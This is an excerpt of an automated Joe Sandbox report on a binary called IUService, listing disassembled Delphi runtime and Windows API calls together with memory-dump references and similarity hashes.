                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,?,00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D491
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,?,00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D49B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$System@@$String$Asg$qqrr20Stringx20$Length$qqrr20Stringi$Char$qqrx20Unicode$qqrpbuipcuiUtf8lstrlen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1537582155-0
                                                                                                                                            • Opcode ID: 6c4ef39c03e1d23b9309869b8de45e6fcba1332ee3670c4631afad92b9265e4a
                                                                                                                                            • Instruction ID: 1243ab6cbdefdf8345f412232093dd449079060f735b143d8bc3f4c3f6575941
                                                                                                                                            • Opcode Fuzzy Hash: 6c4ef39c03e1d23b9309869b8de45e6fcba1332ee3670c4631afad92b9265e4a
                                                                                                                                            • Instruction Fuzzy Hash: E101F534601A84ABFB11DBA5D8B299EB3E9DFA4210FE58773B50097212DB74EE01D1E4
                                                                                                                                            APIs
                                                                                                                                            • @System@@IntfClear$qqrr45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,?,5003194E,00000000,5003196E,?,?,00000000,?,50031CBB), ref: 5003633E
                                                                                                                                            • @Variants@VarCastError$qqrxusxus.RTL120(?,?,?,5003194E,00000000,5003196E,?,?,00000000,?,50031CBB), ref: 50036356
                                                                                                                                            • @System@@IntfClear$qqrr45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,?,5003194E,00000000,5003196E,?,?,00000000,?,50031CBB), ref: 5003635D
                                                                                                                                            • @System@@IntfCopy$qqrr45System@%DelphiInterface$t17System@IInterface%x45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,?,5003194E,00000000,5003196E,?,?,00000000,?,50031CBB), ref: 50036369
                                                                                                                                            • @System@@IntfCopy$qqrr45System@%DelphiInterface$t17System@IInterface%x45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,?,5003194E,00000000,5003196E,?,?,00000000,?,50031CBB), ref: 50036377
                                                                                                                                            • @Variants@FindCustomVariantType$qqrxusrp27Variants@TCustomVariantType.RTL120(?,?,?,5003194E,00000000,5003196E,?,?,00000000,?,50031CBB), ref: 50036383
                                                                                                                                              • Part of subcall function 5003B6A4: EnterCriticalSection.KERNEL32(500A8E3C,?,?,?,00000000,?,5003923A,00000000,500392C3,?,?,?,?,00000000,00000000,00000000), ref: 5003B6DA
                                                                                                                                              • Part of subcall function 5003B6A4: @System@@DynArrayLength$qqrv.RTL120(00000000,5003B74C,?,500A8E3C,?,?,?,00000000,?,5003923A,00000000,500392C3), ref: 5003B6F2
                                                                                                                                              • Part of subcall function 5003B6A4: LeaveCriticalSection.KERNEL32(500A8E3C,5003B753,?,500A8E3C,?,?,?,00000000,?,5003923A,00000000,500392C3), ref: 5003B746
                                                                                                                                            • @System@@IntfClear$qqrr45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,?,5003194E,00000000,5003196E,?,?,00000000,?,50031CBB), ref: 5003638E
                                                                                                                                            • @System@TObject@GetInterface$qqrrx5_GUIDpv.RTL120(?,?,?,5003194E,00000000,5003196E,?,?,00000000,?,50031CBB), ref: 5003639D
                                                                                                                                              • Part of subcall function 50006CB4: @System@TObject@GetInterfaceEntry$qqrrx5_GUID.RTL120(00000000,50006D38), ref: 50006CE0
                                                                                                                                              • Part of subcall function 50006CB4: @System@@IntfClear$qqrr45System@%DelphiInterface$t17System@IInterface%.RTL120(50006D3F), ref: 50006D32
                                                                                                                                            • @Variants@VarCastError$qqrxusxus.RTL120(?,?,?,5003194E,00000000,5003196E,?,?,00000000,?,50031CBB), ref: 500363AD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                             • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                             • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                             • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                             • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                             • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                             • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                             • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                             • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$DelphiInterface$t17System@%$System@@$Interface%Intf$Clear$qqrr45Variants@$CastCopy$qqrr45CriticalCustomError$qqrxusxusInterface%x45Object@SectionVariant$ArrayEnterEntry$qqrrx5_FindInterfaceInterface$qqrrx5_LeaveLength$qqrvTypeType$qqrxusrp27
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 51746642-0
                                                                                                                                            • Opcode ID: 111d1bd1a72e71e83d2ab9bdd4abfcded7f0651f7ae7179b8c71a1e186a9c31a
                                                                                                                                            • Instruction ID: 446bae114840e30f26b3b664076e927c87e989805c5bfb182e6f535140cd3d56
                                                                                                                                            • Opcode Fuzzy Hash: 111d1bd1a72e71e83d2ab9bdd4abfcded7f0651f7ae7179b8c71a1e186a9c31a
                                                                                                                                            • Instruction Fuzzy Hash: E30180043190904FDB12A7A8E5515FD72D1DF56624F10C353B5408B317CB69CE8693E6
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: T@P
                                                                                                                                            • API String ID: 0-2218095447
                                                                                                                                            • Opcode ID: 2735e6c39fcff9f4b0946c2650835f74bb3b70cbc3805efadd1a251d44f47135
                                                                                                                                            • Instruction ID: 27dc2a38aba9eb27cd1e85926dff11305057f2316d7a6dc2ed62153db4641c43
                                                                                                                                            • Opcode Fuzzy Hash: 2735e6c39fcff9f4b0946c2650835f74bb3b70cbc3805efadd1a251d44f47135
                                                                                                                                            • Instruction Fuzzy Hash: ED51B934900B80CFF724CFA8EC64B867BE0BB45320F81472EE98587262DB759884CB65
                                                                                                                                            APIs
                                                                                                                                            • @System@AcquireExceptionObject$qqrv.RTL120(?,?,?,?,?,?,500086BE,500041BB,50004202), ref: 5000860A
                                                                                                                                            • @System@TObject@Free$qqrv.RTL120(?,?,?,?,?,?,500086BE,500041BB,50004202), ref: 50008617
                                                                                                                                            • @System@AcquireExceptionObject$qqrv.RTL120(?,?,?,?,?,?,500086BE,500041BB,50004202), ref: 5000861C
                                                                                                                                            • @System@UnregisterModule$qqrp17System@TLibModule.RTL120(?,?,?,?,?,?,500086BE,500041BB,50004202), ref: 50008644
                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,500086BE,500041BB,50004202), ref: 5000865C
                                                                                                                                            • ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,500086BE,500041BB,50004202), ref: 50008694
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$AcquireExceptionObject$qqrv$ExitFreeFree$qqrvLibraryModuleModule$qqrp17Object@ProcessUnregister
                                                                                                                                            • String ID: T@P
                                                                                                                                            • API String ID: 3627422618-2218095447
                                                                                                                                            • Opcode ID: f0d280432ca972ea6fe1c2b580152eead50abd2acda08fe9b4d21eab7651e6ea
                                                                                                                                            • Instruction ID: 4a4c4bef56c973cbd5feeae4d951ec7c4dcbae2887cfb847883f1a9252908ba7
                                                                                                                                            • Opcode Fuzzy Hash: f0d280432ca972ea6fe1c2b580152eead50abd2acda08fe9b4d21eab7651e6ea
                                                                                                                                            • Instruction Fuzzy Hash: 5721AD70901BC18FF7209BB498A4B86B6E47B54324F860B2EEAC583252DBB5DC84CB55
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(00000000,5001C9B7), ref: 5001C94D
                                                                                                                                              • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C430
                                                                                                                                              • Part of subcall function 5001C3F4: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C442
                                                                                                                                              • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C466
                                                                                                                                              • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C48D
                                                                                                                                              • Part of subcall function 5001C3F4: @Sysutils@StrScan$qqrpxbb.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C49C
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C9B7), ref: 5001C970
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001C9B7), ref: 5001C991
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001C9B7), ref: 5001C99C
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$System@@$String$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Sysutils@$Asg$qqrr20Char$qqrx20Copy$qqrx20Delimiter$qqrx20LastScan$qqrpxbbStringiiStringt1Stringx20
                                                                                                                                            • String ID: .\:
                                                                                                                                            • API String ID: 1552234271-496007442
                                                                                                                                            • Opcode ID: 3dc59a3a4042f2af38c8c9ff90ffa329698c3951d405d49f161df8a05a6a6c33
                                                                                                                                            • Instruction ID: 4b29117d5e5b6616636b4a21a03f3e77820cdaa5a79e53c5ecbb7995722f26fe
                                                                                                                                            • Opcode Fuzzy Hash: 3dc59a3a4042f2af38c8c9ff90ffa329698c3951d405d49f161df8a05a6a6c33
                                                                                                                                            • Instruction Fuzzy Hash: 6001D630A112C8EB9B11DFB9DD56CAEB3F9EF9632076043B6F400D3251DA70DE419691
                                                                                                                                            APIs
                                                                                                                                            • @System@@Close$qqrr15System@TTextRec.RTL120(00000000,5000D89E), ref: 5000D85E
                                                                                                                                              • Part of subcall function 50004E58: @System@SetInOutRes$qqri.RTL120(0000D7B1,?,50004A02,?,?,50004A3D), ref: 50004E90
                                                                                                                                            • @System@@Close$qqrr15System@TTextRec.RTL120(00000000,5000D89E), ref: 5000D868
                                                                                                                                              • Part of subcall function 50004E58: @System@SetInOutRes$qqri.RTL120(0000D7B1,?,50004A02,?,?,50004A3D), ref: 50004EA4
                                                                                                                                            • @System@@Close$qqrr15System@TTextRec.RTL120(00000000,5000D89E), ref: 5000D872
                                                                                                                                              • Part of subcall function 50003F0C: CloseHandle.KERNEL32(?,5000D87C,00000000,5000D89E), ref: 50003F1B
                                                                                                                                              • Part of subcall function 50003F0C: VirtualFree.KERNEL32(?,00000000,00008000,5000D87C,00000000,5000D89E), ref: 50003F4B
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(00000000,5000D89E), ref: 5000D881
                                                                                                                                              • Part of subcall function 500087A8: @System@@FreeMem$qqrpv.RTL120(?,50004445,5000444D), ref: 500087C4
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(00000000,5000D89E), ref: 5000D88B
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$System@$Close$qqrr15Text$Clr$qqrpvFreeRes$qqri$CloseHandleMem$qqrpvVirtual
                                                                                                                                            • String ID: 0CP$`@P
                                                                                                                                            • API String ID: 1074734335-699206834
                                                                                                                                            • Opcode ID: 5dd963d20aa9d17184e9b04b3596eb2fb7a121d5b3ae81a9c3fb34c116752437
                                                                                                                                            • Instruction ID: 65ae3e41759c052dc381d089f7c5f52dc025f958349b81aa71df701aec3d44ee
                                                                                                                                            • Opcode Fuzzy Hash: 5dd963d20aa9d17184e9b04b3596eb2fb7a121d5b3ae81a9c3fb34c116752437
                                                                                                                                            • Instruction Fuzzy Hash: 98E092795099C84B77867BE8783242D7698FFD6D143D24B63FD4486602CE38882157B7
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000000,?), ref: 500029AE
                                                                                                                                            • Sleep.KERNEL32(0000000A,00000000,?), ref: 500029C8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
• Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001B78E), ref: 5001B6D2
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001B78E), ref: 5001B6E0
                                                                                                                                              • Part of subcall function 50009D94: @System@@FreeMem$qqrpv.RTL120(5000D52A,?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 50009DC3
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001B78E), ref: 5001B6FD
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001B78E), ref: 5001B725
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5001B78E), ref: 5001B739
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,5001B78E), ref: 5001B743
                                                                                                                                            • CompareStringW.KERNEL32(00000400,00000001,00000000,?,00000000,?,00000000,5001B78E), ref: 5001B750
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Asg$qqrr20Char$qqrx20InternalStringx20$CompareFreeMem$qqrpv
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2845561448-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50016A76,?,?,?,?,00000000,00000000,00000000,00000000), ref: 500169BA
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50016A76,?,?,?,?,00000000,00000000,00000000,00000000), ref: 500169FB
                                                                                                                                              • Part of subcall function 5000A1E4: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A202
                                                                                                                                            • @Sysutils@IntToStr$qqri.RTL120(00000000,50016A76,?,?,?,?,00000000,00000000,00000000,00000000), ref: 500169EF
                                                                                                                                              • Part of subcall function 5001B1C8: @System@@UStrFromPCharLen$qqrr20System@UnicodeStringpci.RTL120 ref: 5001B1DB
                                                                                                                                            • @Sysutils@IntToStr$qqri.RTL120(00000000,50016A76,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016A27
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50016A76,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016A33
                                                                                                                                            • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50016A76,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016A4A
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50016A76,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016A56
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$System@@$Stringx20$Cat3$qqrr20Stringt2$Asg$qqrr20FromStr$qqriStringSysutils@$CharChar$qqrr20Len$qqrr20StringbStringpci
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2719714811-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002B982,?,?,?,?,?,?,5002B7F6,00000000,5002B80C,?,?,00000000), ref: 5002B8E6
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @Sysutils@TStringBuilder@set_Length$qqri.RTL120(00000000,5002B982,?,?,?,?,?,?,5002B7F6,00000000,5002B80C,?,?,00000000), ref: 5002B8FB
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002B982,?,?,?,?,?,?,5002B7F6,00000000,5002B80C,?,?,00000000), ref: 5002B918
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002B982,?,?,?,?,?,?,5002B7F6,00000000,5002B80C,?,?,00000000), ref: 5002B940
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5002B982,?,?,?,?,?,?,5002B7F6,00000000,5002B80C,?,?,00000000), ref: 5002B953
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(00000000,5002B982,?,?,?,?,?,?,5002B7F6,00000000,5002B80C,?,?,00000000), ref: 5002B967
                                                                                                                                            Similarity
                                                                                                                                            • API ID: StringSystem@$System@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Builder@set_Char$qqrx20Length$qqriMove$qqrpxvpviSysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 509217649-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A202
                                                                                                                                              • Part of subcall function 50009D40: @System@@NewUnicodeString$qqri.RTL120(00000000,?,50004742), ref: 50009D5B
                                                                                                                                              • Part of subcall function 50009D40: @System@Move$qqrpxvpvi.RTL120(00000000,?,50004742), ref: 50009D69
                                                                                                                                              • Part of subcall function 50009D40: @System@@FreeMem$qqrpv.RTL120(50004742), ref: 50009D8B
                                                                                                                                            • @System@@NewUnicodeString$qqri.RTL120 ref: 5000A227
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A23B
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A253
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A263
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A279
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A287
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A297
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$System@@$Asg$qqrr20StringStringx20$Move$qqrpxvpvi$String$qqri$Clr$qqrpvFreeMem$qqrpv
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 628645394-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028822), ref: 5002879B
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028822), ref: 500287C3
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50028822), ref: 500287D7
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,00000000,50028822), ref: 500287E0
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50028822), ref: 500287F6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: StringSystem@System@@Unicode$AnsiChar$qqrx20FromStr$qqrr20Stringx27System@%T$us$i0$%$Internal
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1771006815-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500156E2), ref: 50015657
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500156E2), ref: 5001567F
                                                                                                                                            • @Sysutils@ByteType$qqrx20System@UnicodeStringi.RTL120(00000000,500156E2), ref: 5001569F
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,500156E2), ref: 500156AB
                                                                                                                                            • @Sysutils@AnsiStrIComp$qqrpbt1.RTL120(00000000,500156E2), ref: 500156B7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$AnsiStringSystem@@$FromStr$qqrr20Stringx27System@%T$us$i0$%$InternalSysutils@$ByteChar$qqrx20Comp$qqrpbt1StringiType$qqrx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1446078087-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500159A6), ref: 5001591B
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500159A6), ref: 50015943
                                                                                                                                            • @Sysutils@ByteType$qqrx20System@UnicodeStringi.RTL120(00000000,500159A6), ref: 50015963
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,500159A6), ref: 5001596F
                                                                                                                                            • @Sysutils@AnsiStrComp$qqrpbt1.RTL120(00000000,500159A6), ref: 5001597B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$AnsiStringSystem@@$FromStr$qqrr20Stringx27System@%T$us$i0$%$InternalSysutils@$ByteChar$qqrx20Comp$qqrpbt1StringiType$qqrx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1446078087-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,500155FB), ref: 50015563
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500155FB), ref: 50015582
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500155FB), ref: 500155AA
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,500155FB), ref: 500155C4
                                                                                                                                            • CompareStringW.KERNEL32(00000400,00000001,00000000,?,00000000,?,00000000,500155FB), ref: 500155D3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: String$System@System@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Char$qqrx20Internal$Compare
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1952152088-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001A16A,?,?,?,00000000,00000000,?,500158A1,?,00000000,500158BE), ref: 5001A0C8
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001A16A,?,?,?,00000000,00000000,?,500158A1,?,00000000,500158BE), ref: 5001A0D2
                                                                                                                                              • Part of subcall function 50009D94: @System@@FreeMem$qqrpv.RTL120(5000D52A,?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 50009DC3
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A16A,?,?,?,00000000,00000000,?,500158A1,?,00000000,500158BE), ref: 5001A0EF
